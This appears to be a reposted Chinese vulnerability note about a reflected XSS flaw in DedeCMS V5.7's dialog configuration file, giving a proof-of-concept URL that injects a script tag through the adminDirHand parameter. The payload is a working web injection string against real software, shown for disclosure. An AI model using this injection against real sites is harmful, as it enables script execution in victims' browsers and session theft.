漏洞地址及证明:/include/dialog/config.php?adminDirHand="/></script><script>alert(1);</script>
DedeCMS V5.7 Dialog目录下配置文件XSS漏洞,布布扣,bubuko.com
DedeCMS V5.7 Dialog目录下配置文件XSS漏洞
原文:http://www.cnblogs.com/milantgh/p/3615853.html